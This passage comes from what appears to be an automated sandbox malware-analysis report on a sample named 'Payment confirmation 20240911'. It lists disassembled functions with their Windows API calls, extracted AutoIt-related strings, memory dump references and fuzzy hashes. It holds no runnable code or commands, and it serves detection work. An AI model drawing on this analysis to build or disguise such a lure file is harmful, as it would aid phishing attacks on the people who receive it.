                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                          • String ID:
                                          • API String ID: 1996641542-0
                                          • Opcode ID: 02e0f9766f18424f5d8f35264dc5deeb00fe044612e4c12b7cc24c175635e2b2
                                          • Instruction ID: 4001866bd77199a739a1c331ad130308d4109303c1aeaeea05e7bcabf3fdb220
                                          • Opcode Fuzzy Hash: 02e0f9766f18424f5d8f35264dc5deeb00fe044612e4c12b7cc24c175635e2b2
                                          • Instruction Fuzzy Hash: 23514C71A00208EFDF219FE9DC48EAE7BB9EB08324F118515FA55AB2A5D771A940CB50
                                          Function 0134744C Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCursorPos.USER32(?), ref: 01347587
                                          • GetDesktopWindow.USER32 ref: 0134759C
                                          • GetWindowRect.USER32(00000000), ref: 013475A3
                                          • GetWindowLongW.USER32(?,000000F0), ref: 01347605
                                          • DestroyWindow.USER32 ref: 01347631
                                          • CreateWindowExW.USER32 ref: 0134765A
                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 01347678
                                          • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 0134769E
                                          • SendMessageW.USER32(?,00000421,?,?), ref: 013476B3
                                          • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 013476C6
                                          • IsWindowVisible.USER32(?), ref: 013476E6
                                          • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 01347701
                                          • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 01347715
                                          • GetWindowRect.USER32(?,?), ref: 0134772D
                                          • MonitorFromPoint.USER32(?,?,00000002), ref: 01347753
                                          • GetMonitorInfoW.USER32 ref: 0134776D
                                          • CopyRect.USER32(?,?), ref: 01347784
                                          • SendMessageW.USER32(?,00000412,00000000), ref: 013477EF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                          • String ID: ($0$tooltips_class32
                                          • API String ID: 698492251-4156429822
                                          • Opcode ID: b5c952150e6afcb6ee26677b86b33a720bc6089e3cdb0d1e6f8a0ac5884ddcef
                                          • Instruction ID: cc46571419e9440b60ce752c59302d929c97e65494f7d6a2d83a0b038365e308
                                          • Opcode Fuzzy Hash: b5c952150e6afcb6ee26677b86b33a720bc6089e3cdb0d1e6f8a0ac5884ddcef
                                          • Instruction Fuzzy Hash: C3B1DF71604341AFDB14DF68C948B6ABFE9FF88324F40891CF589AB291DB75E804CB91
                                          Function 013276DB Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 178COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileVersionInfoSizeW.VERSION(?,?), ref: 013276ED
                                          • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 01327713
                                          • _wcscpy.LIBCMT ref: 01327741
                                          • _wcscmp.LIBCMT ref: 0132774C
                                          • _wcscat.LIBCMT ref: 01327762
                                          • _wcsstr.LIBCMT ref: 0132776D
                                          • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 01327789
                                          • _wcscat.LIBCMT ref: 013277D2
                                          • _wcscat.LIBCMT ref: 013277D9
                                          • _wcsncpy.LIBCMT ref: 01327804
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                          • API String ID: 699586101-1459072770
                                          • Opcode ID: 9ddd2e4d555d14f8be02c64101f3b67311d11fac15290e49288ae097ec656237
                                          • Instruction ID: ee7fb5657e0df3b2b8d021afbae05834cc7a5aafcad79494ad651c5432e6d762
                                          • Opcode Fuzzy Hash: 9ddd2e4d555d14f8be02c64101f3b67311d11fac15290e49288ae097ec656237
                                          • Instruction Fuzzy Hash: 1A410971A002167AEB06BBBD8C56EBF7BECEF2571CF000059F504A61D1EB74DA0197A1
                                          Function 012FA756 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000,?,00000000,?,?,?,?,00000000), ref: 012FA839
                                          • GetSystemMetrics.USER32(00000007,?,?,?,?,00000000), ref: 012FA841
                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000,?,00000000,?,?,?), ref: 012FA86C
                                          • GetSystemMetrics.USER32(00000008,?,?,?), ref: 012FA874
                                          • GetSystemMetrics.USER32(00000004,?,?,?), ref: 012FA899
                                          • SetRect.USER32 ref: 012FA8B6
                                          • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 012FA8C6
                                          • CreateWindowExW.USER32 ref: 012FA8F9
                                          • SetWindowLongW.USER32(00000000,000000EB,00000000,?,?,?), ref: 012FA90D
                                          • GetClientRect.USER32(00000000,000000FF,?,?,?), ref: 012FA92B
                                          • GetStockObject.GDI32(00000011), ref: 012FA947
                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 012FA952
                                            • Part of subcall function 012FB736: GetCursorPos.USER32(000000FF), ref: 012FB749
                                            • Part of subcall function 012FB736: ScreenToClient.USER32(00000000,000000FF), ref: 012FB766
                                            • Part of subcall function 012FB736: GetAsyncKeyState.USER32 ref: 012FB78B
                                            • Part of subcall function 012FB736: GetAsyncKeyState.USER32 ref: 012FB799
                                          • SetTimer.USER32(00000000,00000000,00000028,012FACEE), ref: 012FA979
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                          • String ID: AutoIt v3 GUI
                                          • API String ID: 1458621304-248962490
                                          • Opcode ID: 332d69007588fc3c46cd1c889bf53ad24cb41c82ae6bbc90d9ab466754e0ccfd
                                          • Instruction ID: cdec79c50b4489a53da8602e52f917fde8b7be8b41f37387b763bf32acb9e2c9
                                          • Opcode Fuzzy Hash: 332d69007588fc3c46cd1c889bf53ad24cb41c82ae6bbc90d9ab466754e0ccfd
                                          • Instruction Fuzzy Hash: 00B1827561020AEFDB24DFA8C845FADBBB8FB08714F014229FB5AA7294D774D901CB50
                                          Function 0134352A Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 01343626
                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,0137DBF0,00000000,?,00000000,?,?), ref: 01343694
                                          • RegCloseKey.ADVAPI32(00000000), ref: 013436DC
                                          • RegSetValueExW.ADVAPI32 ref: 01343765
                                          • RegCloseKey.ADVAPI32(?), ref: 01343A85
                                          • RegCloseKey.ADVAPI32(00000000), ref: 01343A92
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Close$ConnectCreateRegistryValue
                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                          • API String ID: 536824911-966354055
                                          • Opcode ID: 10e2cd5514ccac9d8ab35ea97b4455fd0864a0b1424a522d59e58edf27614cdb
                                          • Instruction ID: 69bbd06eade6506c540e9f7c6c02e9c0fbed539f60dd014c89cc992221e84ebd
                                          • Opcode Fuzzy Hash: 10e2cd5514ccac9d8ab35ea97b4455fd0864a0b1424a522d59e58edf27614cdb
                                          • Instruction Fuzzy Hash: 89027C756106129FDB14EF28C994E2AB7E5FF99324F04845DE98A9B3A0DB30FD05CB81
                                          Function 013469C5 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CharUpperBuffW.USER32(?,?), ref: 01346A52
                                          • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 01346B12
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: BuffCharMessageSendUpper
                                          • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                          • API String ID: 3974292440-719923060
                                          • Opcode ID: 86be55ea2eac178c65a9a2c9e831e984685bbb88581eef8b64785b1582553e44
                                          • Instruction ID: 1a72a690be45583107790c374e835530a8b3bc41fb3346a244a3506d457a7770
                                          • Opcode Fuzzy Hash: 86be55ea2eac178c65a9a2c9e831e984685bbb88581eef8b64785b1582553e44
                                          • Instruction Fuzzy Hash: E4A1C1742143069FCB08EF18C951A7AB7E5FF96218F04896DE9969B391DB31EC0ACB41
                                          Function 0131DD46 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetClassNameW.USER32(?,?,00000100), ref: 0131DD87
                                          • __swprintf.LIBCMT ref: 0131DE28
                                          • _wcscmp.LIBCMT ref: 0131DE3B
                                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0131DE90
                                          • _wcscmp.LIBCMT ref: 0131DECC
                                          • GetClassNameW.USER32(?,?,00000400), ref: 0131DF03
                                          • GetDlgCtrlID.USER32 ref: 0131DF55
                                          • GetWindowRect.USER32(?,?), ref: 0131DF8B
                                          • GetParent.USER32(?), ref: 0131DFA9
                                          • ScreenToClient.USER32(00000000), ref: 0131DFB0
                                          • GetClassNameW.USER32(?,?,00000100), ref: 0131E02A
                                          • _wcscmp.LIBCMT ref: 0131E03E
                                          • GetWindowTextW.USER32(?,?,00000400), ref: 0131E064
                                          • _wcscmp.LIBCMT ref: 0131E078
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                          • String ID: %s%u
                                          • API String ID: 3119225716-679674701
                                          • Opcode ID: 8cd87e0d66fe0029a6d82371651b24b780ca1b7884bc686783b8e5d0053cfc07
                                          • Instruction ID: 352ce301fd1deb8b124f8e82c6a17b555fbaba1492937a5219a3c254d7610811
                                          • Opcode Fuzzy Hash: 8cd87e0d66fe0029a6d82371651b24b780ca1b7884bc686783b8e5d0053cfc07
                                          • Instruction Fuzzy Hash: 31A1F831204307AFD71ADFA9C888FAAB7E8FF45318F008529E999C3195DB31E655CB91
                                          Function 0131E69D Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetClassNameW.USER32(00000008,?,00000400), ref: 0131E6E1
                                          • _wcscmp.LIBCMT ref: 0131E6F2
                                          • GetWindowTextW.USER32(00000001,?,00000400), ref: 0131E71A
                                          • CharUpperBuffW.USER32(?,00000000), ref: 0131E737
                                          • _wcscmp.LIBCMT ref: 0131E755
                                          • _wcsstr.LIBCMT ref: 0131E766
                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 0131E79E
                                          • _wcscmp.LIBCMT ref: 0131E7AE
                                          • GetWindowTextW.USER32(00000002,?,00000400), ref: 0131E7D5
                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 0131E81E
                                          • _wcscmp.LIBCMT ref: 0131E82E
                                          • GetClassNameW.USER32(00000010,?,00000400), ref: 0131E856
                                          • GetWindowRect.USER32(00000004,?), ref: 0131E8BF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                          • String ID: @$ThumbnailClass
                                          • API String ID: 1788623398-1539354611
                                          • Opcode ID: e6d35020e56bc5e255bc3c3772447277c4a2030685fbfbe542ae3418109c6f5f
                                          • Instruction ID: 5ac59549489e5b0fe4d7db96e55329655fcef1f909bfeec8989746895f90ddb7
                                          • Opcode Fuzzy Hash: e6d35020e56bc5e255bc3c3772447277c4a2030685fbfbe542ae3418109c6f5f
                                          • Instruction Fuzzy Hash: B581B3311043069FEB1ADF58C884FAA7BECFF44718F04847AED899A099DB35D945CBA1
                                          Function 0134CC68 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 205windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 0134CD0B
                                          • DestroyWindow.USER32 ref: 0134CD83
                                            • Part of subcall function 012E7E53: _memmove.LIBCMT ref: 012E7EB9
                                          • CreateWindowExW.USER32 ref: 0134CE04
                                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0134CE26
                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0134CE35
                                          • DestroyWindow.USER32 ref: 0134CE52
                                          • CreateWindowExW.USER32 ref: 0134CE85
                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0134CEA4
                                          • GetDesktopWindow.USER32 ref: 0134CEB9
                                          • GetWindowRect.USER32(00000000), ref: 0134CEC0
                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0134CED2
                                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0134CEEA
                                            • Part of subcall function 012FB155: GetWindowLongW.USER32(?,000000EB), ref: 012FB166
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                          • String ID: 0$`"u$tooltips_class32
                                          • API String ID: 1297703922-2677254722
                                          • Opcode ID: c50532004fb7c62d755e4755fdc1c46524c0a7e5a1e690716f0322b2cbd6fe31
                                          • Instruction ID: de75b905c6ab6c9a56d62a491d77dfbb05f6f6a6b4dea266e2e8a2f887448a97
                                          • Opcode Fuzzy Hash: c50532004fb7c62d755e4755fdc1c46524c0a7e5a1e690716f0322b2cbd6fe31
                                          • Instruction Fuzzy Hash: 7D71CE75240309AFEB35CF28C844FA63BE9FB89748F84051CFA89972A1D775E841CB15
                                          Function 0134F122 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 178windowfileCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 012FAF7D: GetWindowLongW.USER32(?,000000EB), ref: 012FAF8E
                                          • DragQueryPoint.SHELL32(?,?), ref: 0134F14B
                                            • Part of subcall function 0134D5EE: ClientToScreen.USER32(?,?), ref: 0134D617
                                            • Part of subcall function 0134D5EE: GetWindowRect.USER32(?,?), ref: 0134D68D
                                            • Part of subcall function 0134D5EE: PtInRect.USER32(?,?,0134EB2C), ref: 0134D69D
                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 0134F1B4
                                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0134F1BF
                                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0134F1E2
                                          • _wcscat.LIBCMT ref: 0134F212
                                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0134F229
                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 0134F242
                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 0134F259
                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 0134F27B
                                          • DragFinish.SHELL32(?), ref: 0134F282
                                          • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0134F36D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$`"u
                                          • API String ID: 169749273-1427848159
                                          • Opcode ID: 0bfecb0193e1106373953391c523e3ea458ad7c4e58a3043760640eda4dd4d4d
                                          • Instruction ID: 54def67b49c49f362db34dbfcb516b99b89dd523480a42db2bd0d2b18b3cad23
                                          • Opcode Fuzzy Hash: 0bfecb0193e1106373953391c523e3ea458ad7c4e58a3043760640eda4dd4d4d
                                          • Instruction Fuzzy Hash: 95617D76108305AFC711EFA4D848DABBBFCFF99714F404A1DF695921A0DB70AA05CB52
                                          Function 0131E4EA Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: __wcsnicmp
                                          • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                          • API String ID: 1038674560-1810252412
                                          • Opcode ID: 2a4f0a29f367be99fdf6129ef718894bb1b226a8634866efe7681ac910e22fef
                                          • Instruction ID: c9e08acadf808023992eb223b46dbe5672519d21204386172a93c2d674b17ae0
                                          • Opcode Fuzzy Hash: 2a4f0a29f367be99fdf6129ef718894bb1b226a8634866efe7681ac910e22fef
                                          • Instruction Fuzzy Hash: D6318F3194460AF6DF1AEBA5CD16EBF73E85F21A1CFA00528E941711D8FF62AB04CA51
                                          Function 0131F898 Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadIconW.USER32 ref: 0131F8AB
                                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0131F8BD
                                          • SetWindowTextW.USER32(?,?), ref: 0131F8D4
                                          • GetDlgItem.USER32(?,000003EA), ref: 0131F8E9
                                          • SetWindowTextW.USER32(00000000,?), ref: 0131F8EF
                                          • GetDlgItem.USER32(?,000003E9), ref: 0131F8FF
                                          • SetWindowTextW.USER32(00000000,?), ref: 0131F905
                                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0131F926
                                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0131F940
                                          • GetWindowRect.USER32(?,?), ref: 0131F949
                                          • SetWindowTextW.USER32(?,?), ref: 0131F9B4
                                          • GetDesktopWindow.USER32 ref: 0131F9BA
                                          • GetWindowRect.USER32(00000000), ref: 0131F9C1
                                          • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0131FA0D
                                          • GetClientRect.USER32(?,?), ref: 0131FA1A
                                          • PostMessageW.USER32 ref: 0131FA3F
                                          • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0131FA6A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                          • String ID:
                                          • API String ID: 3869813825-0
                                          • Opcode ID: 70da5bcd8ecb11696e4c4ee973708834478be94d03a698c8da85801ba47ac523
                                          • Instruction ID: 6b457d53a402ee14e629be9fe6d224c2cc37c1d8642c5a1fdbd3bacaf9544c87
                                          • Opcode Fuzzy Hash: 70da5bcd8ecb11696e4c4ee973708834478be94d03a698c8da85801ba47ac523
                                          • Instruction Fuzzy Hash: 3D513E71A00709AFDB249FA8CD89F6EBBF9FF04718F004518E696A65A4C774A948CF50
                                          Function 0132B428 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 350timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • VariantInit.OLEAUT32(00000000), ref: 0132B46D
                                          • VariantCopy.OLEAUT32(?,?), ref: 0132B476
                                          • VariantClear.OLEAUT32(?), ref: 0132B482
                                          • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0132B561
                                          • __swprintf.LIBCMT ref: 0132B591
                                          • VarR8FromDec.OLEAUT32(?,?), ref: 0132B5BD
                                          • VariantInit.OLEAUT32(?), ref: 0132B63F
                                          • SysFreeString.OLEAUT32(00000016), ref: 0132B6D1
                                          • VariantClear.OLEAUT32(?), ref: 0132B727
                                          • VariantClear.OLEAUT32(?), ref: 0132B736
                                          • VariantInit.OLEAUT32(00000000), ref: 0132B772
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
